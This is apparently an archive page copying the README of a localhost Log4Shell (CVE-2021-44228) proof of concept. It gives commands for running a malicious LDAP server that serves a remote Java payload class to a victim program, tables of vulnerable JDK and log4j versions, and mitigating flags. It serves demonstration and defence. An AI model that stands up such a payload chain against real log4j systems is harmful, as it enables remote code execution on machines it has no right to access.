关联漏洞
描述
A short demo of CVE-2021-44228
介绍
# sample-ldap-exploit
A short demo of CVE-2021-44228
## Build
~~~
$ mvn clean verify
~~~
## Run Attacker
~~~
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
~~~
URLs:
- `http://localhost:8080/`
- `http://localhost:8080/sample/payload/Payload.class`
## Run Victim
~~~
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
~~~
## Results
### JDK / JRE
| Version | Status |
|----------------------------------|----------------------------------------------------------------------------|
| `Oracle JDK 8u5` | vulnerable |
| `OpenJDK 8u312` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `IBM OpenJDK 8u312-b07 (OpenJ9)` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.7+10` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.13+8` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 16+36` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17+35` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17.0.1+12` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
If NOT vulnerable, an instance of `javax.naming.Reference` is returned from `javax.naming.Context.lookup()`.
If NOT vulnerable to loading classes from remote code bases,
other **Java deserialization vulnerabilities probably still exist**!
### log4j
| Version | Status |
|----------|-------------------------------------------------------------------------------------------------------------------|
| `2.9.1` | vulnerable |
| `2.10.0` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.14.1` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.15.0` | NOT vulnerable |
If NOT vulnerable, `${jndi:ldap:...}` is NOT resolved.
文件快照
[4.0K] /data/pocs/4da7d204bd3be540b799d95159b6b6929e1e3808
├── [4.0K] attacker
│ ├── [1.8K] pom.xml
│ └── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] sample
│ └── [4.0K] attacker
│ ├── [2.9K] Attacker.java
│ └── [1.8K] ReferenceInterceptor.java
├── [4.0K] payload
│ ├── [ 789] pom.xml
│ └── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] sample
│ └── [4.0K] payload
│ └── [ 719] Payload.java
├── [ 569] pom.xml
├── [2.7K] README.md
└── [4.0K] victim
├── [1.5K] pom.xml
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] sample
└── [4.0K] victim
└── [ 532] Victim.java
18 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。